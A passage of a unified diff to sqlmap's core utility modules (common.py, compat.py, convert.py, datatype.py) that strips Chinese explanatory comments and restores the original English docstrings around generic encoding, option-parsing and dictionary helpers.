-                    # 将kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]加1
                    kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
-                    # 如果不抑制警告
                    if not suppressWarning:
                        warnMsg = "reflective value(s) found and filtering out"
                        singleTimeWarnMessage(warnMsg)
@ -4500,7 +4367,6 @@ def isNullValue(value):
    False
    """

-    # 判断value是否具有upper()方法，并且value的大写等于NULL
    return hasattr(value, "upper") and value.upper() == NULL

 def expandMnemonics(mnemonics, parser, args):
@ -4508,23 +4374,19 @@ def expandMnemonics(mnemonics, parser, args):
    Expands mnemonic options
    """

-    # 定义一个MnemonicNode类，用于存储选项
    class MnemonicNode(object):
        def __init__(self):
            self.next = {}
            self.current = []

-    # 初始化头节点和指针
    head = MnemonicNode()
    pointer = None

-    # 遍历parser中的option_groups
    for group in parser.option_groups:
        for option in group.option_list:
            for opt in option._long_opts + option._short_opts:
                pointer = head

-                # 遍历opt中的每个字符
                for char in opt:
                    if char == "-":
                        continue
@ -4534,14 +4396,12 @@ def expandMnemonics(mnemonics, parser, args):
                    pointer = pointer.next[char]
                    pointer.current.append(option)

-    # 遍历mnemonics中的每个选项
    for mnemonic in (mnemonics or "").split(','):
        found = None
        name = mnemonic.split('=')[0].replace('-', "").strip()
        value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
        pointer = head

-        # 遍历name中的每个字符
        for char in name:
            if char in pointer.next:
                pointer = pointer.next[char]
@ -4549,12 +4409,10 @@ def expandMnemonics(mnemonics, parser, args):
                pointer = None
                break

-        # 如果pointer为None或head，则抛出异常
        if pointer in (None, head):
            errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name
            raise SqlmapSyntaxException(errMsg)

-        # 如果pointer.current的长度大于1，则说明有多个选项，需要进行解析
        elif len(pointer.current) > 1:
            options = {}

@ -4564,32 +4422,26 @@ def expandMnemonics(mnemonics, parser, args):
                    if opt.startswith(name):
                        options[opt] = option

-            # 如果options为空，则说明没有找到对应的选项，进行警告
            if not options:
                warnMsg = "mnemonic '%s' can't be resolved" % name
                logger.warning(warnMsg)
-            # 如果name在options中，则说明找到了对应的选项，进行调试
            elif name in options:
                found = name
                debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
                logger.debug(debugMsg)
-            # 否则，说明有多个选项，进行警告，并选择最短的选项
            else:
                found = sorted(options.keys(), key=len)[0]
                warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options))
                warnMsg += "Resolved to shortest of those ('%s')" % found
                logger.warning(warnMsg)

-            # 如果找到了对应的选项，则进行赋值
            if found:
                found = options[found]
-        # 如果pointer.current的长度等于1，则说明只有一个选项，进行调试
        else:
            found = pointer.current[0]
            debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
            logger.debug(debugMsg)

-        # 如果找到了对应的选项，则进行赋值
        if found:
            try:
                value = found.convert_value(found, value)
@ -4616,18 +4468,13 @@ def safeCSValue(value):
    'foobar'
    """

-    # 初始化返回值
    retVal = value

-    # 如果value不为空，并且是字符串类型
    if retVal and isinstance(retVal, six.string_types):
-        # 如果value的第一个字符和最后一个字符不是双引号，并且value中包含csv分隔符、双引号或换行符
        if not (retVal[0] == retVal[-1] == '"'):
            if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')):
-                # 将value中的双引号替换为两个双引号，并在value的两端加上双引号
                retVal = '"%s"' % retVal.replace('"', '""')

-    # 返回处理后的value
    return retVal

 def filterPairValues(values):
@ -4638,15 +4485,11 @@ def filterPairValues(values):
    [[1, 2], [4, 5]]
    """

-    # 初始化返回值
    retVal = []

-    # 如果values不为空，并且是可迭代的
    if not isNoneValue(values) and hasattr(values, '__iter__'):
-        # 遍历values中的每个value
        retVal = [value for value in values if isinstance(value, (tuple, list, set)) and len(value) == 2]

-    # 返回处理后的values
    return retVal

 def randomizeParameterValue(value):
@ -5674,7 +5517,6 @@ def unsafeVariableNaming(value):
    True
    """

-    # 如果value以EVALCODE_ENCODED_PREFIX开头，则解码value
    if value.startswith(EVALCODE_ENCODED_PREFIX):
        value = decodeHex(value[len(EVALCODE_ENCODED_PREFIX):], binary=False)

@ -5690,7 +5532,6 @@ def firstNotNone(*args):

    retVal = None

-    # 遍历args，找到第一个不为None的值
    for _ in args:
        if _ is not None:
            retVal = _
@ -5708,7 +5549,6 @@ def removePostHintPrefix(value):
    'id'
    """

-    # 使用正则表达式去除value中的POST提示前缀
    return re.sub(r"\A(%s) " % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), "", value)

 def chunkSplitPostData(data):
--- a/src/sqlmap-master/lib/core/compat.py
+++ b/src/sqlmap-master/lib/core/compat.py
@ -167,13 +167,9 @@ class WichmannHill(random.Random):
        self.__whseed(x, y, z)

 def patchHeaders(headers):
-    # 如果headers不为空且没有headers属性
    if headers is not None and not hasattr(headers, "headers"):
-        # 如果headers是字典类型
        if isinstance(headers, dict):
-            # 定义一个类，继承自字典
            class _(dict):
-                # 重写__getitem__方法，将key转换为小写后进行比较
                def __getitem__(self, key):
                    for key_ in self:
                        if key_.lower() == key.lower():
@ -181,17 +177,14 @@ def patchHeaders(headers):

                    raise KeyError(key)

-                # 重写get方法，如果key不存在，返回默认值
                def get(self, key, default=None):
                    try:
                        return self[key]
                    except KeyError:
                        return default

-            # 将headers转换为_类
            headers = _(headers)

-        # 将headers转换为字符串列表
        headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers]

    return headers
@ -204,13 +197,10 @@ def cmp(a, b):
    1
    """

-    # 如果a小于b，返回-1
    if a < b:
        return -1
-    # 如果a大于b，返回1
    elif a > b:
        return 1
-    # 如果a等于b，返回0
    else:
        return 0

@ -221,17 +211,13 @@ def choose_boundary():
    True
    """

-    # 定义一个空字符串
    retval = ""

-    # 尝试生成一个32位的随机字符串
    try:
        retval = uuid.uuid4().hex
-    # 如果uuid模块不存在，则使用random模块生成32位的随机字符串
    except AttributeError:
        retval = "".join(random.sample("0123456789abcdef", 1)[0] for _ in xrange(32))

-    # 返回生成的32位随机字符串
    return retval

 # Reference: http://python3porting.com/differences.html
@ -259,47 +245,36 @@ def cmp_to_key(mycmp):
            self.obj = obj

        def __lt__(self, other):
-            """小于号比较"""
            return mycmp(self.obj, other.obj) < 0

        def __gt__(self, other):
-            """大于号比较"""
            return mycmp(self.obj, other.obj) > 0

        def __eq__(self, other):
-            """等于号比较"""
            return mycmp(self.obj, other.obj) == 0

        def __le__(self, other):
-            """小于等于号比较"""
            return mycmp(self.obj, other.obj) <= 0

        def __ge__(self, other):
-            """大于等于号比较"""
            return mycmp(self.obj, other.obj) >= 0

        def __ne__(self, other):
-            """不等于号比较"""
            return mycmp(self.obj, other.obj) != 0

        def __hash__(self):
-            """哈希函数"""
            raise TypeError('hash not implemented')

    return K

 # Note: patch for Python 2.6
 if not hasattr(functools, "cmp_to_key"):
-    # 如果functools模块中没有cmp_to_key函数，则定义cmp_to_key函数
    functools.cmp_to_key = cmp_to_key

 if sys.version_info >= (3, 0):
-    # 如果Python版本大于等于3.0，则将xrange函数替换为range函数
    xrange = range
-    # 将buffer函数替换为memoryview函数
    buffer = memoryview
 else:
-    # 如果Python版本小于3.0，则保持xrange和buffer函数不变
    xrange = xrange
    buffer = buffer

@ -323,26 +298,17 @@ def LooseVersion(version):
    8.000022
    """

-    # 使用正则表达式匹配版本号
    match = re.search(r"\A(\d[\d.]*)", version or "")

    if match:
-        # 如果匹配成功，则将result初始化为0
        result = 0
-        # 获取匹配到的第一个分组
        value = match.group(1)
-        # 将权重初始化为1.0
        weight = 1.0
-        # 将value去掉首尾的.，并按.分割成多个部分
        for part in value.strip('.').split('.'):
-            # 如果部分是数字，则将其转换为整数，并乘以权重，加到result中
            if part.isdigit():
                result += int(part) * weight
-            # 将权重乘以0.001
            weight *= 1e-3
    else:
-        # 如果匹配不成功，则将result设置为NaN
        result = float("NaN")

-    # 返回result
    return result
--- a/src/sqlmap-master/lib/core/convert.py
+++ b/src/sqlmap-master/lib/core/convert.py
@ -5,38 +5,34 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 尝试导入cPickle(一个更快的pickle实现),如果失败则导入普通的pickle
 try:
    import cPickle as pickle
 except:
    import pickle

-# 导入所需的标准库
-import base64  # 用于Base64编码/解码
-import binascii  # 用于二进制和ASCII转换
-import codecs  # 用于编码转换
-import json  # 用于JSON处理
-import re  # 用于正则表达式
-import sys  # 用于系统相关操作
-import time  # 用于时间相关操作
-
-# 导入自定义模块和第三方库
-from lib.core.bigarray import BigArray  # 用于处理大型数组
-from lib.core.compat import xrange  # 兼容Python2/3的range函数
-from lib.core.data import conf  # 配置数据
-from lib.core.data import kb  # 知识库数据
-from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA  # Unicode私有区域设置
-from lib.core.settings import IS_TTY  # 是否为终端环境
-from lib.core.settings import IS_WIN  # 是否为Windows系统
-from lib.core.settings import NULL  # 空值常量
-from lib.core.settings import PICKLE_PROTOCOL  # pickle协议版本
-from lib.core.settings import SAFE_HEX_MARKER  # 安全的十六进制标记
-from lib.core.settings import UNICODE_ENCODING  # Unicode编码设置
-from thirdparty import six  # Python 2/3兼容库
-from thirdparty.six import unichr as _unichr  # 兼容的unichr函数
-from thirdparty.six.moves import collections_abc as _collections  # 集合类型
-
-# 尝试导入HTML转义函数,适配不同Python版本
+import base64
+import binascii
+import codecs
+import json
+import re
+import sys
+import time
+
+from lib.core.bigarray import BigArray
+from lib.core.compat import xrange
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA
+from lib.core.settings import IS_TTY
+from lib.core.settings import IS_WIN
+from lib.core.settings import NULL
+from lib.core.settings import PICKLE_PROTOCOL
+from lib.core.settings import SAFE_HEX_MARKER
+from lib.core.settings import UNICODE_ENCODING
+from thirdparty import six
+from thirdparty.six import unichr as _unichr
+from thirdparty.six.moves import collections_abc as _collections
+
 try:
    from html import escape as htmlEscape
 except ImportError:
@ -44,14 +40,8 @@ except ImportError:

 def base64pickle(value):
    """
-    将输入值序列化(使用pickle)并编码为Base64格式
-    
-    参数:
-        value: 要序列化和编码的值
-    返回:
-        Base64编码的字符串
-    
-    示例:
+    Serializes (with pickle) and encodes to Base64 format supplied (binary) value
+
    >>> base64unpickle(base64pickle([1, 2, 3])) == [1, 2, 3]
    True
    """
@ -59,33 +49,23 @@ def base64pickle(value):
    retVal = None

    try:
-        # 尝试使用指定协议进行pickle序列化,然后Base64编码
        retVal = encodeBase64(pickle.dumps(value, PICKLE_PROTOCOL), binary=False)
    except:
-        # 如果失败,发出警告
        warnMsg = "problem occurred while serializing "
        warnMsg += "instance of a type '%s'" % type(value)
        singleTimeWarnMessage(warnMsg)

        try:
-            # 尝试不指定协议进行序列化
            retVal = encodeBase64(pickle.dumps(value), binary=False)
        except:
-            # 如果还是失败,则将值转为字符串后再序列化
            retVal = encodeBase64(pickle.dumps(str(value), PICKLE_PROTOCOL), binary=False)

    return retVal

 def base64unpickle(value):
    """
-    将Base64编码的值解码并反序列化(使用pickle)
-    
-    参数:
-        value: Base64编码的字符串
-    返回:
-        反序列化后的Python对象
-    
-    示例:
+    Decodes value from Base64 to plain format and deserializes (with pickle) its content
+
    >>> type(base64unpickle('gAJjX19idWlsdGluX18Kb2JqZWN0CnEBKYFxAi4=')) == object
    True
    """
@ -93,24 +73,16 @@ def base64unpickle(value):
    retVal = None

    try:
-        # 尝试解码并反序列化
        retVal = pickle.loads(decodeBase64(value))
    except TypeError:
-        # 如果失败,尝试将输入转换为bytes后再处理
        retVal = pickle.loads(decodeBase64(bytes(value)))

    return retVal

 def htmlUnescape(value):
    """
-    将HTML转义的字符转换回原始字符
-    
-    参数:
-        value: 包含HTML转义字符的字符串
-    返回:
-        转换后的字符串
-    
-    示例:
+    Returns (basic conversion) HTML unescaped value
+
    >>> htmlUnescape('a&lt;b') == 'a<b'
    True
    """
@ -118,56 +90,35 @@ def htmlUnescape(value):
    retVal = value

    if value and isinstance(value, six.string_types):
-        # 定义HTML转义字符的替换规则
        replacements = (("&lt;", '<'), ("&gt;", '>'), ("&quot;", '"'), ("&nbsp;", ' '), ("&amp;", '&'), ("&apos;", "'"))
-        # 逐个替换HTML转义字符
        for code, value in replacements:
            retVal = retVal.replace(code, value)

        try:
-            # 处理十六进制格式的HTML实体(如&#x41;)
            retVal = re.sub(r"&#x([^ ;]+);", lambda match: _unichr(int(match.group(1), 16)), retVal)
        except (ValueError, OverflowError):
            pass

    return retVal

-def singleTimeWarnMessage(message):  # 交叉引用的函数
-    """
-    向标准输出打印一次性警告消息
-    """
+def singleTimeWarnMessage(message):  # Cross-referenced function
    sys.stdout.write(message)
    sys.stdout.write("\n")
    sys.stdout.flush()

-def filterNone(values):  # 交叉引用的函数
-    """
-    过滤掉可迭代对象中的None值
-    """
+def filterNone(values):  # Cross-referenced function
    return [_ for _ in values if _] if isinstance(values, _collections.Iterable) else values

-def isListLike(value):  # 交叉引用的函数
-    """
-    判断一个值是否类似列表(list, tuple, set或BigArray)
-    """
+def isListLike(value):  # Cross-referenced function
    return isinstance(value, (list, tuple, set, BigArray))

-def shellExec(cmd):  # 交叉引用的函数
-    """
-    执行shell命令(未实现)
-    """
+def shellExec(cmd):  # Cross-referenced function
    raise NotImplementedError

 def jsonize(data):
    """
-    将数据序列化为JSON格式
-    
-    参数:
-        data: 要序列化的数据
-    返回:
-        JSON字符串
-    
-    示例:
+    Returns JSON serialized data
+
    >>> jsonize({'foo':'bar'})
    '{\\n    "foo": "bar"\\n}'
    """
@ -176,14 +127,8 @@ def jsonize(data):

 def dejsonize(data):
    """
-    将JSON字符串反序列化为Python对象
-    
-    参数:
-        data: JSON字符串
-    返回:
-        Python对象
-    
-    示例:
+    Returns JSON deserialized data
+
    >>> dejsonize('{\\n    "foo": "bar"\\n}') == {u'foo': u'bar'}
    True
    """
@ -192,42 +137,25 @@ def dejsonize(data):

 def rot13(data):
    """
-    对文本进行ROT13编码/解码
-    ROT13是一种简单的替换密码,将字母移动13位
-    
-    参数:
-        data: 要编码/解码的文本
-    返回:
-        编码/解码后的文本
-    
-    示例:
+    Returns ROT13 encoded/decoded text
+
    >>> rot13('foobar was here!!')
    'sbbone jnf urer!!'
    >>> rot13('sbbone jnf urer!!')
    'foobar was here!!'
    """

-    # 参考: https://stackoverflow.com/a/62662878
+    # Reference: https://stackoverflow.com/a/62662878
    retVal = ""
-    # 创建字母表(包含小写和大写字母各重复一次,用于13位移动)
    alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
-    # 对每个字符进行处理
    for char in data:
-        # 如果是字母则移动13位,否则保持不变
        retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char
    return retVal

 def decodeHex(value, binary=True):
    """
-    将十六进制值解码为原始形式
-    
-    参数:
-        value: 十六进制字符串
-        binary: 是否返回二进制格式
-    返回:
-        解码后的值
-    
-    示例:
+    Returns a decoded representation of provided hexadecimal value
+
    >>> decodeHex("313233") == b"123"
    True
    >>> decodeHex("313233", binary=False) == u"123"
@ -236,22 +164,17 @@ def decodeHex(value, binary=True):

    retVal = value

-    # 如果输入是二进制格式,转换为文本
    if isinstance(value, six.binary_type):
        value = getText(value)

-    # 如果以"0x"开头,去掉这个前缀
    if value.lower().startswith("0x"):
        value = value[2:]

    try:
-        # 尝试使用codecs解码
        retVal = codecs.decode(value, "hex")
    except LookupError:
-        # 如果失败,使用binascii解码
        retVal = binascii.unhexlify(value)

-    # 如果不需要二进制格式,转换为文本
    if not binary:
        retVal = getText(retVal)

@ -259,15 +182,8 @@ def decodeHex(value, binary=True):

 def encodeHex(value, binary=True):
    """
-    将值编码为十六进制格式
-    
-    参数:
-        value: 要编码的值
-        binary: 是否返回二进制格式
-    返回:
-        十六进制编码的值
-    
-    示例:
+    Returns a encoded representation of provided string value
+
    >>> encodeHex(b"123") == b"313233"
    True
    >>> encodeHex("123", binary=False)
@ -276,22 +192,17 @@ def encodeHex(value, binary=True):
    True
    """

-    # 如果是整数,转换为Unicode字符
    if isinstance(value, int):
        value = six.unichr(value)

-    # 如果是Unicode字符串,编码为bytes
    if isinstance(value, six.text_type):
        value = value.encode(UNICODE_ENCODING)

    try:
-        # 尝试使用codecs编码
        retVal = codecs.encode(value, "hex")
    except LookupError:
-        # 如果失败,使用binascii编码
        retVal = binascii.hexlify(value)

-    # 如果不需要二进制格式,转换为文本
    if not binary:
        retVal = getText(retVal)

@ -299,16 +210,8 @@ def encodeHex(value, binary=True):

 def decodeBase64(value, binary=True, encoding=None):
    """
-    将Base64编码的值解码
-    
-    参数:
-        value: Base64编码的字符串
-        binary: 是否返回二进制格式
-        encoding: 指定编码
-    返回:
-        解码后的值
-    
-    示例:
+    Returns a decoded representation of provided Base64 value
+
    >>> decodeBase64("MTIz") == b"123"
    True
    >>> decodeBase64("MTIz", binary=False)
@ -326,26 +229,21 @@ def decodeBase64(value, binary=True, encoding=None):
    if value is None:
        return None

-    # 设置填充字符
    padding = b'=' if isinstance(value, bytes) else '='

-    # 参考: https://stackoverflow.com/a/49459036
-    # 如果没有填充字符,添加填充
+    # Reference: https://stackoverflow.com/a/49459036
    if not value.endswith(padding):
        value += 3 * padding

-    # 参考: https://en.wikipedia.org/wiki/Base64#URL_applications
-    # 参考: https://perldoc.perl.org/MIME/Base64.html
-    # 将URL安全的Base64字符替换为标准Base64字符
+    # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications
+    # Reference: https://perldoc.perl.org/MIME/Base64.html
    if isinstance(value, bytes):
        value = value.replace(b'-', b'+').replace(b'_', b'/')
    else:
        value = value.replace('-', '+').replace('_', '/')

-    # 解码Base64
    retVal = base64.b64decode(value)

-    # 如果不需要二进制格式,转换为文本
    if not binary:
        retVal = getText(retVal, encoding)

@ -353,18 +251,8 @@ def decodeBase64(value, binary=True, encoding=None):

 def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False):
    """
-    将值编码为Base64格式
-    
-    参数:
-        value: 要编码的值
-        binary: 是否返回二进制格式
-        encoding: 指定编码
-        padding: 是否添加填充字符
-        safe: 是否使用URL安全的字符
-    返回:
-        Base64编码的值
-    
-    示例:
+    Returns a decoded representation of provided Base64 value
+
    >>> encodeBase64(b"123") == b"MTIz"
    True
    >>> encodeBase64(u"1234", binary=False)
@ -378,30 +266,24 @@ def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False):
    if value is None:
        return None

-    # 如果是Unicode字符串,编码为bytes
    if isinstance(value, six.text_type):
        value = value.encode(encoding or UNICODE_ENCODING)

-    # 编码为Base64
    retVal = base64.b64encode(value)

-    # 如果不需要二进制格式,转换为文本
    if not binary:
        retVal = getText(retVal, encoding)

-    # 如果需要URL安全格式
    if safe:
        padding = False

-        # 参考: https://en.wikipedia.org/wiki/Base64#URL_applications
-        # 参考: https://perldoc.perl.org/MIME/Base64.html
-        # 将标准Base64字符替换为URL安全的字符
+        # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications
+        # Reference: https://perldoc.perl.org/MIME/Base64.html
        if isinstance(retVal, bytes):
            retVal = retVal.replace(b'+', b'-').replace(b'/', b'_')
        else:
            retVal = retVal.replace('+', '-').replace('/', '_')

-    # 如果不需要填充,移除填充字符
    if not padding:
        retVal = retVal.rstrip(b'=' if isinstance(retVal, bytes) else '=')

@ -409,71 +291,47 @@ def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False):

 def getBytes(value, encoding=None, errors="strict", unsafe=True):
    """
-    将Unicode值转换为字节表示
-    
-    参数:
-        value: Unicode字符串
-        encoding: 指定编码
-        errors: 错误处理方式
-        unsafe: 是否允许不安全的字符
-    返回:
-        字节表示
-    
-    示例:
+    Returns byte representation of provided Unicode value
+
    >>> getBytes(u"foo\\\\x01\\\\x83\\\\xffbar") == b"foo\\x01\\x83\\xffbar"
    True
    """

    retVal = value

-    # 如果没有指定编码,使用配置中的编码或默认编码
    if encoding is None:
        encoding = conf.get("encoding") or UNICODE_ENCODING

-    # 验证编码是否有效
    try:
        codecs.lookup(encoding)
    except (LookupError, TypeError):
        encoding = UNICODE_ENCODING

-    # 如果是Unicode字符串
    if isinstance(value, six.text_type):
        if INVALID_UNICODE_PRIVATE_AREA:
            if unsafe:
-                # 处理Unicode私有区域字符
                for char in xrange(0xF0000, 0xF00FF + 1):
                    value = value.replace(_unichr(char), "%s%02x" % (SAFE_HEX_MARKER, char - 0xF0000))

-            # 编码为字节
            retVal = value.encode(encoding, errors)

            if unsafe:
-                # 处理安全的十六进制标记
                retVal = re.sub(r"%s([0-9a-f]{2})" % SAFE_HEX_MARKER, lambda _: decodeHex(_.group(1)), retVal)
        else:
            try:
-                # 尝试使用指定编码
                retVal = value.encode(encoding, errors)
            except UnicodeError:
-                # 如果失败,使用Unicode编码并替换无法编码的字符
                retVal = value.encode(UNICODE_ENCODING, errors="replace")

            if unsafe:
-                # 处理转义序列
                retVal = re.sub(b"\\\\x([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), retVal)

    return retVal

 def getOrds(value):
    """
-    返回字符串中每个字符的序号(ord)值
-    
-    参数:
-        value: 字符串
-    返回:
-        序号值列表
-    
-    示例:
+    Returns ORD(...) representation of provided string value
+
    >>> getOrds(u'fo\\xf6bar')
    [102, 111, 246, 98, 97, 114]
    >>> getOrds(b"fo\\xc3\\xb6bar")
@ -484,16 +342,8 @@ def getOrds(value):

 def getUnicode(value, encoding=None, noneToNull=False):
    """
-    返回值的Unicode表示
-    
-    参数:
-        value: 要转换的值
-        encoding: 指定编码
-        noneToNull: 是否将None转换为NULL
-    返回:
-        Unicode字符串
-    
-    示例:
+    Returns the unicode representation of the supplied value
+
    >>> getUnicode('test') == u'test'
    True
    >>> getUnicode(1) == u'1'
@ -502,22 +352,18 @@ def getUnicode(value, encoding=None, noneToNull=False):
    True
    """

-    # 检查时间限制
+    # Best position for --time-limit mechanism
    if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit):
        raise SystemExit

-    # 如果需要将None转换为NULL
    if noneToNull and value is None:
        return NULL

-    # 如果已经是Unicode字符串,直接返回
    if isinstance(value, six.text_type):
        return value
-    # 如果是字节字符串
    elif isinstance(value, six.binary_type):
-        # 获取可能的编码列表
+        # Heuristics (if encoding not explicitly specified)
        candidates = filterNone((encoding, kb.get("pageEncoding") if kb.get("originalPage") else None, conf.get("encoding"), UNICODE_ENCODING, sys.getfilesystemencoding()))
-        # 根据内容特征调整编码优先级
        if all(_ in value for _ in (b'<', b'>')):
            pass
        elif any(_ in value for _ in (b":\\", b'/', b'.')) and b'\n' not in value:
@ -525,7 +371,6 @@ def getUnicode(value, encoding=None, noneToNull=False):
        elif conf.get("encoding") and b'\n' not in value:
            candidates = filterNone((encoding, conf.get("encoding"), kb.get("pageEncoding") if kb.get("originalPage") else None, sys.getfilesystemencoding(), UNICODE_ENCODING))

-        # 尝试使用不同的编码解码
        for candidate in candidates:
            try:
                return six.text_type(value, candidate)
@ -533,34 +378,22 @@ def getUnicode(value, encoding=None, noneToNull=False):
                pass

        try:
-            # 尝试使用指定编码或页面编码
            return six.text_type(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING)
        except UnicodeDecodeError:
-            # 如果失败,使用可逆的错误处理方式
            return six.text_type(value, UNICODE_ENCODING, errors="reversible")
-    # 如果是类列表对象
    elif isListLike(value):
        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
        return value
    else:
        try:
-            # 尝试直接转换为Unicode
            return six.text_type(value)
        except UnicodeDecodeError:
-            # 如果失败,忽略错误转换为字符串
-            return six.text_type(str(value), errors="ignore")
+            return six.text_type(str(value), errors="ignore")  # encoding ignored for non-basestring instances

 def getText(value, encoding=None):
    """
-    返回值的文本表示(注意:在Python2中不一定是Unicode)
-    
-    参数:
-        value: 要转换的值
-        encoding: 指定编码
-    返回:
-        文本字符串
-    
-    示例:
+    Returns textual value of a given value (Note: not necessary Unicode on Python2)
+
    >>> getText(b"foobar")
    'foobar'
    >>> isinstance(getText(u"fo\\u2299bar"), six.text_type)
@ -569,11 +402,9 @@ def getText(value, encoding=None):

    retVal = value

-    # 如果是字节字符串,转换为Unicode
    if isinstance(value, six.binary_type):
        retVal = getUnicode(value, encoding)

-    # 在Python2中,尝试转换为str类型
    if six.PY2:
        try:
            retVal = str(retVal)
@ -584,17 +415,11 @@ def getText(value, encoding=None):

 def stdoutEncode(value):
    """
-    返回适合写入stdout的值的二进制表示
-    
-    参数:
-        value: 要编码的值
-    返回:
-        编码后的值
+    Returns binary representation of a given Unicode value safe for writing to stdout
    """

    value = value or ""

-    # 在Windows终端环境下获取代码页
    if IS_WIN and IS_TTY and kb.get("codePage", -1) is None:
        output = shellExec("chcp")
        match = re.search(r": (\d{3,})", output or "")
@ -610,21 +435,16 @@ def stdoutEncode(value):

        kb.codePage = kb.codePage or ""

-    # 如果是Unicode字符串
    if isinstance(value, six.text_type):
-        # 获取编码
        encoding = kb.get("codePage") or getattr(sys.stdout, "encoding", None) or UNICODE_ENCODING

        while True:
            try:
-                # 尝试编码
                retVal = value.encode(encoding)
                break
            except UnicodeEncodeError as ex:
-                # 如果编码失败,用问号替换无法编码的字符
                value = value[:ex.start] + "?" * (ex.end - ex.start) + value[ex.end:]

-                # 发出警告消息
                warnMsg = "cannot properly display (some) Unicode characters "
                warnMsg += "inside your terminal ('%s') environment. All " % encoding
                warnMsg += "unhandled occurrences will result in "
@ -633,7 +453,6 @@ def stdoutEncode(value):
                warnMsg += "corresponding output files"
                singleTimeWarnMessage(warnMsg)

-        # 在Python3中转换回Unicode
        if six.PY3:
            retVal = getUnicode(retVal, encoding)

@ -644,14 +463,8 @@ def stdoutEncode(value):

 def getConsoleLength(value):
    """
-    返回字符串在控制台中的显示宽度
-    
-    参数:
-        value: 要计算长度的字符串
-    返回:
-        显示宽度
-    
-    示例:
+    Returns console width of unicode values
+
    >>> getConsoleLength("abc")
    3
    >>> getConsoleLength(u"\\u957f\\u6c5f")
@ -659,10 +472,8 @@ def getConsoleLength(value):
    """

    if isinstance(value, six.text_type):
-        # 对于Unicode字符串,CJK字符占用2个宽度,其他字符占用1个宽度
        retVal = sum((2 if ord(_) >= 0x3000 else 1) for _ in value)
    else:
-        # 对于非Unicode字符串,使用长度作为宽度
        retVal = len(value)

    return retVal
--- a/src/sqlmap-master/lib/core/datatype.py
+++ b/src/sqlmap-master/lib/core/datatype.py
@ -5,15 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入必要的模块
-import copy # 导入 copy 模块，用于对象复制
-import threading # 导入 threading 模块，用于线程同步
-import types # 导入 types 模块，用于类型判断
+import copy
+import threading
+import types

-from thirdparty.odict import OrderedDict # 导入 thirdparty 中的 OrderedDict 类，用于实现有序字典
-from thirdparty.six.moves import collections_abc as _collections # 导入 six 库中的 collections_abc 模块，用于抽象集合类
+from thirdparty.odict import OrderedDict
+from thirdparty.six.moves import collections_abc as _collections

-# 定义 AttribDict 类，继承自 dict，允许以属性方式访问字典成员
 class AttribDict(dict):
    """
    This class defines the dictionary with added capability to access members as attributes
@ -24,20 +22,20 @@ class AttribDict(dict):
    1
    """

-    # 初始化方法，接受一个字典 indict，一个属性 attribute 和一个布尔值 keycheck
    def __init__(self, indict=None, attribute=None, keycheck=True):
-        if indict is None: # 如果 indict 为空，初始化为空字典
+        if indict is None:
            indict = {}

-        # 设置属性，这些属性在初始化前是普通属性
+        # Set any attributes here - before initialisation
+        # these remain as normal attributes
        self.attribute = attribute
        self.keycheck = keycheck
-        dict.__init__(self, indict) # 调用 dict 的初始化方法
-        self.__initialised = True # 设置初始化完成标志
+        dict.__init__(self, indict)
+        self.__initialised = True

-        # 在初始化之后，设置属性与设置字典项相同
+        # After initialisation, setting attributes
+        # is the same as setting an item

-    # 定义 __getattr__ 方法，用于获取属性
    def __getattr__(self, item):
        """
        Maps values to attributes
@ -45,95 +43,89 @@ class AttribDict(dict):
        """

        try:
-            return self.__getitem__(item) # 尝试获取字典项
-        except KeyError: # 如果字典中不存在此键
-            if self.keycheck: # 如果 keycheck 为 True
-                raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
-            else: # 如果 keycheck 为 False
-                return None # 返回 None
-
-    # 定义 __delattr__ 方法，用于删除属性
+            return self.__getitem__(item)
+        except KeyError:
+            if self.keycheck:
+                raise AttributeError("unable to access item '%s'" % item)
+            else:
+                return None
+
    def __delattr__(self, item):
        """
        Deletes attributes
        """

        try:
-            return self.pop(item) # 尝试从字典中删除项
-        except KeyError: # 如果字典中不存在此键
-            if self.keycheck: # 如果 keycheck 为 True
-                raise AttributeError("unable to access item '%s'" % item) # 抛出属性错误
-            else: # 如果 keycheck 为 False
-                return None # 返回 None
-
-    # 定义 __setattr__ 方法，用于设置属性
+            return self.pop(item)
+        except KeyError:
+            if self.keycheck:
+                raise AttributeError("unable to access item '%s'" % item)
+            else:
+                return None
+
    def __setattr__(self, item, value):
        """
        Maps attributes to values
        Only if we are initialised
        """

-        # 在初始化方法中允许设置属性
+        # This test allows attributes to be set in the __init__ method
        if "_AttribDict__initialised" not in self.__dict__:
            return dict.__setattr__(self, item, value)

-        # 正常处理普通属性
+        # Any normal attributes are handled normally
        elif item in self.__dict__:
            dict.__setattr__(self, item, value)

-        else: # 其他情况，将属性映射到字典项
+        else:
            self.__setitem__(item, value)

-    # 定义 __getstate__ 方法，用于支持序列化
    def __getstate__(self):
